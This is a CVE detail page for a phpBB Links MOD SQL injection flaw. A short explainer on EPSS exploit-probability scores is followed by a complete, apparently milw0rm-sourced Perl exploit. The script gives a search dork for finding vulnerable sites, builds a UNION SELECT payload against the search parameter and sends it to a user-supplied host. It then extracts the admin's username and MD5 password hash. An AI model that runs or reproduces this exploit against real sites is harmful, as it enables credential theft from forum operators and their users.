CVE-2007-4653 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/usr/bin/perl print q{ phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit Bug discovered by Don Dork: allinurl:links.php?t=search or: "Links MOD v1.2.2 by phpBB2.de" SQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/* }; use IO::Socket; print q{ => Insert URL => without ( http ) => }; $server = <STDIN>; chop ($server); print q{ => Insert directory => es: /forum/ - /phpBB2/ => }; $dir = <STDIN>; chop ($dir); print q{ => User ID => Number: => }; $user = <STDIN>; chop ($user); if (!$ARGV[2]) { } $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5]; $server =~ s/(http:\/\/)//eg; $path = $dir; $path .= "links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=".$user."/*"; print " Exploit in process...\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "Exploit failed"; print "Exploit\r\n"; print "in process...\r\n"; print $socket "GET $path HTTP/1.1\r\n"; print $socket "Host: $server\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; print "Exploit finished!\r\n\r\n"; while ($answer = <$socket>) { if ($answer =~/(\w{32})/) { if ($1 ne 0) { print "MD5-Hash is: ".$1."\r\n"; } exit(); } } # milw0rm.com [2007-08-31]